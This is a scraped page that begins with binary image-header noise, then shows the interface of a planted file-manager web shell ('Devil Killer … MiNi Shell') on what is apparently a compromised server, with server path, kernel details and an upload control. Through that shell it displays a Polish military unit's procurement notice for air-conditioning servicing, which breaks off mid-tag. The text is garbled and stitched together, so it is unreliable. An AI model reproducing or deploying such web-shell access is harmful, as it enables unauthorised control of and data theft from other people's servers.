JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211201/0029457301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wykonanie przeglądów, konserwacji i serwisowanie klimatyzatorów stacjonarnych i wentylacji mechanicznej w kompleksach wojskowych - SOI Sandomierz, SOI Kielce oraz SOI Nowa Dęba (3 części)” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">33 WOJSKOWY ODDZIAŁ GOSPODARCZY W NOWEJ DĘBIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180692828</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Anieli Krzywoń 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Dęba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-460</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261162206</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">33wog.zamowienia-publiczne@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://33wog.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka wojskowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonanie przeglądów, konserwacji i serwisowanie klimatyzatorów stacjonarnych i wentylacji mechanicznej w kompleksach wojskowych - SOI Sandomierz, SOI Kielce oraz SOI Nowa Dęba (3 części)” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b1f491c-52a3-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00294573</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010707/39/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.44 Wykonanie przeglądów, konserwacji i serwisowania klimatyzatorów stacjonarnych i wentylacji mechanicznej w kompleksach administrowanych przez SOI Sandomierz, SOI Kielce oraz SOI Nowa Dęba</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/33wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/33wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie niniejszego zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów i oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną. <br/>2.	Ofertę, oświadczenia oraz inne dokumenty dotyczące niniejszego postępowania, w tym podmiotowe środki dowodowe Wykonawca przekazuje odpowiednio jako dokument elektroniczny bądź cyfrowe odwzorowanie dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (dokument w formatach danych wymienionych w Rozporządzeniu Rady Ministrów z 12 kwietnia 2012r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych opatrzony kwalifikowanym podpisem elektronicznym). <br/>3.	Dla skutecznego przesłania dokumentów elektronicznych w niniejszym postępowaniu koniecznym jest posiadanie kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego wystawionego przez dostawcę kwalifikowanej usługi zaufania, będącego podmiotem świadczącym usługi certyfikacyjne - podpis elektroniczny, spełniające wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016r. o usługach zaufania oraz identyfikacji elektronicznej.<br/>4.	Sposób sporządzenia dokumentów elektronicznych musi być zgodny <br/>z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia <br/>30 grudnia 2020r. w sprawie dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy.<br/>5.	Zgodnie z Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy, podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w Rozporządzeniu, składa się w formie elektronicznej, tj. opatrzonej kwalifikowanym podpisem elektronicznym podpisem zaufanym lub podpisem osobistym.<br/>6.	Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>7.	Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym elektronicznym podpisem zaufanym lub podpisem osobistym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty.<br/>8.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej opisane zostały w Regulaminie Internetowej Platformy zakupowej, dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin oraz Instrukcji dla Wykonawców dostępnej pod adresem https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest 33 Wojskowy Oddział Gospodarczy;<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod33wog@ron.mil.pl.<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zp112/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - wykonanie przeglądów, konserwacji i serwisowanie klimatyzatorów stacjonarnych i wentylacji mechanicznej w kompleksach wojskowych administrowanych przez SOI Sandomierz;<br/>1)	Zakres czynności objętych przedmiotem niniejszego zamówienia obejmuje <br/>w szczególności: <br/>a)	kontrolę filtrów i wymienników, czyszczenie filtrów powietrza, parowacza, skraplacza, odgrzybianie oraz ewentualną wymianę filtrów do central wentylacyjnych na koszt Wykonawcy;<br/>b)	kontrolę wentylatorów, kontrolą mocowań i ułożyskowania, ewentualną wymianę łożysk na koszt Wykonawcy, kontrola stanu technicznego silnika;<br/>c)	kontrolę instalacji odprowadzania skropli, kontrola drożności, połączeń klejonych, stanu tacy ociekowej, stanu pompki skroplin;<br/>d)	kontrolę stanu izolacji zimnochronnej, oględziny ogólne, uzupełnienie braków izolacji;<br/>e)	kontrolę połączeń i parametrów elektrycznych, oględziny ogólne, kontrolę połączeń elektrycznych, pomiar prądów wentylatorów i kompresora;<br/>f)	sterownik klimatyzatora;<br/>g)	kontrolę instalacji chłodniczej, oględziny ogólne, kontrolę szczelności oraz ewentualne uszczelnienie i uzupełnienie czynnika chłodniczego, koncentratu do parowników i koncentratu do skraplaczy na koszt Wykonawcy;<br/>h)	kontrola sprężarki chłodniczej, ciśnienia na ssaniu i tłoczeniu sprężarki.<br/>- z wszelkich wykonywanych pomiarów Wykonawca sporządzi protokoły, które następnie przekaże Zamawiającemu.<br/>2)	Szczegółowy zakres prac objętych przedmiotem niniejszego zamówienia, dla każdej z części, na jakie zostało podzielone zamówienie został przedstawiony w załączniku do SWZ – Opis przedmiotu zamówienia;<br/>3)	Formularze szczegółowej wyceny, sporządzone odrębnie dla każdej z części na jakie zostało podzielone zamówienie stanowią również uzupełnienie opisu przedmiotu zamówienia. <br/>4)	Integralną część niniejszej SWZ oraz uzupełnienie Opisu przedmiotu zamówienia stanowi Wykaz urządzeń klimatyzacyjnych podlegających serwisowaniu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 17623,78 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42500000-1 - Urządzenia chłodzące i wentylacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42510000-4 - Wymienniki ciepła, urządzenia do konfekcjonowania powietrza i urządzenia chłodzące oraz maszyny filtrujące</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny wyłącznie ofert niepodlegających odrzuceniu.<br/>Zamawiający dokona oceny ofert odrębnie dla każdej z części na jakie zostało podzielone zamówienie.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający w odniesieniu do każdej z części na jakie zostało podzielone zamówienie, będzie kierował się niżej opisanymi kryteriami:<br/>	<br/>Cena ofertowa brutto zamówienia 60 pkt<br/> <br/>Czas reakcji na usunięcie awarii	40 pkt<br/> <br/>Oferty będą oceniane według poniższych wzorów i zasad:<br/><br/>Kryterium CENA OFERTOWA BRUTTO ZAMÓWIENIA PODSTAWOWEGO<br/>- waga 60 pkt<br/>C=Cn/Cb x 60 pkt<br/>gdzie: <br/>C – liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w kryterium cena 60 pkt;<br/>Cn – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu;<br/>CB – zaproponowana cena oferty badanej.<br/><br/>Kryterium CZAS REAKCJI NA USUNIĘCIE AWARII – waga 40 pkt<br/>Czas reakcji na usunięcie awarii do 12 godzin – 40 pkt<br/>Czas reakcji na usunięcie awarii do 18 godzin – 20 pkt<br/>Czas reakcji na usunięcie awarii do 24 godzin – 0 pkt (czas reakcji wymagany przez Zamawiającego)<br/>Jeżeli Wykonawca wskaże czas reakcji serwisu na zgłoszenie awarii dłuższy niż 24 godziny jego oferta zostanie odrzucona jako niespełniająca wymagań postawionych w niniejszym postępowaniu o udzielenie zamówienia publicznego.<br/>Oferta Wykonawcy, który nie określił w swojej ofercie czasu reakcji serwisu na zgłoszenie awarii zostanie potraktowana jak oferta z czasem reakcji serwisu na zgłoszenie awarii do 24 godzin.<br/>Oferta Wykonawcy, który zaproponuje czas reakcji serwisu na zgłoszenie awarii krótszy aniżeli 12 godzin zostanie potraktowana jak oferta z 12 godzinnym czasem reakcji.<br/>Zamawiający w toku badania i oceny ofert poprawi w ofercie:<br/>-oczywiste omyłki pisarskie;<br/>-oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek;<br/>-inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty; <br/>- niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>Zamówienie udzielone zostanie temu Wykonawcy, który:<br/>-spełni wymagania określone w niniejszej SWZ;<br/>-przedłoży ofertę, która uzyska największą liczbę punktów we wskazanym kryterium oceny ofert – cena + czas reakcji na usunięcie awarii.<br/>Obliczając punktację dla poszczególnych ofert, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku.<br/>Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ. Jeżeli termin związania ofertą upłynął przed wyborem najkorzystniejszej oferty, Zamawiający wzywa Wykonawcę, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznaczonym przez Zamawiającego terminie pisemnej zgody na wybór jego oferty. <br/>W przypadku braku zgody o której mowa w zdaniu poprzedzającym Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została kolejno najwyżej oceniona, chyba że zachodzą przesłanki unieważnienia postępowania.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i taki sam bilans innego kryterium, Zamawiający wezwie do złożenia w wyznaczonym przez siebie terminie ofert dodatkowych, zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na usunięcie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - wykonanie przeglądów, konserwacji i serwisowanie klimatyzatorów stacjonarnych i wentylacji mechanicznej w kompleksach wojskowych administrowanych przez SOI Kielce;<br/>1)	Zakres czynności objętych przedmiotem niniejszego zamówienia obejmuje <br/>w szczególności: <br/>a)	kontrolę filtrów i wymienników, czyszczenie filtrów powietrza, parowacza, skraplacza, odgrzybianie oraz ewentualną wymianę filtrów do central wentylacyjnych na koszt Wykonawcy;<br/>b)	kontrolę wentylatorów, kontrolą mocowań i ułożyskowania, ewentualną wymianę łożysk na koszt Wykonawcy, kontrola stanu technicznego silnika;<br/>c)	kontrolę instalacji odprowadzania skropli, kontrola drożności, połączeń klejonych, stanu tacy ociekowej, stanu pompki skroplin;<br/>d)	kontrolę stanu izolacji zimnochronnej, oględziny ogólne, uzupełnienie braków izolacji;<br/>e)	kontrolę połączeń i parametrów elektrycznych, oględziny ogólne, kontrolę połączeń elektrycznych, pomiar prądów wentylatorów i kompresora;<br/>f)	sterownik klimatyzatora;<br/>g)	kontrolę instalacji chłodniczej, oględziny ogólne, kontrolę szczelności oraz ewentualne uszczelnienie i uzupełnienie czynnika chłodniczego, koncentratu do parowników i koncentratu do skraplaczy na koszt Wykonawcy;<br/>h)	kontrola sprężarki chłodniczej, ciśnienia na ssaniu i tłoczeniu sprężarki.<br/>- z wszelkich wykonywanych pomiarów Wykonawca sporządzi protokoły, które następnie przekaże Zamawiającemu.<br/>2)	Szczegółowy zakres prac objętych przedmiotem niniejszego zamówienia, dla każdej z części, na jakie zostało podzielone zamówienie został przedstawiony w załączniku do SWZ – Opis przedmiotu zamówienia;<br/>3)	Formularze szczegółowej wyceny, sporządzone odrębnie dla każdej z części na jakie zostało podzielone zamówienie stanowią również uzupełnienie opisu przedmiotu zamówienia. <br/>4)	Integralną część niniejszej SWZ oraz uzupełnienie Opisu przedmiotu zamówienia stanowi Wykaz urządzeń klimatyzacyjnych podlegających serwisowaniu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 27953,10 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span 